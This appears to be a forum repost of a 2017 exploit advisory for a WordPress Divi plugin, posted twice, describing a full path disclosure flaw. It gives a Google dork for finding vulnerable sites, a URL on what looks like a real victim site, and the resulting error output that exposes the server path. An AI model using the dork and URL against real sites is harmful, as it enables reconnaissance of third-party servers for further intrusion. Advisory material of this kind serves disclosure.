- 10 Ocak 2014
- 10
- 0
wordpress exploit
title: Wordpress divi 100 articlecard FDP by KelvinSecTeam
Date: 26/10/2017
Category : Webapps
URL Vendor : https://www.elegantthemes.com/blog/...n-gives-the-divi-blog-module-a-brand-new-look
Google Dork : inurl:wp-content/plugins/divi-100-article-card
author: KelvinSecurity
FDP owasp: Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view.
EXAMPLE:
URL_: http://tusambil.com/barquisimeto/wp-content/plugins/divi-100-article-card/
FDP: http://tusambil.com/barquisimeto/wp-content/plugins/divi-100-article-card/article-card.php
Fatal error: Call to undefined function add_filter() in C:\inetpub\wwwroot\WebApps\Sambil\Barquisimeto\wp-content\plugins\divi-100-article-card\article-card.php on line 27
title: Wordpress divi 100 articlecard FDP by KelvinSecTeam
Date: 26/10/2017
Category : Webapps
URL Vendor : https://www.elegantthemes.com/blog/...n-gives-the-divi-blog-module-a-brand-new-look
Google Dork : inurl:wp-content/plugins/divi-100-article-card
author: KelvinSecurity
FDP owasp: Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view.
EXAMPLE:
URL_: http://tusambil.com/barquisimeto/wp-content/plugins/divi-100-article-card/
FDP: http://tusambil.com/barquisimeto/wp-content/plugins/divi-100-article-card/article-card.php
Fatal error: Call to undefined function add_filter() in C:\inetpub\wwwroot\WebApps\Sambil\Barquisimeto\wp-content\plugins\divi-100-article-card\article-card.php on line 27
Son düzenleme: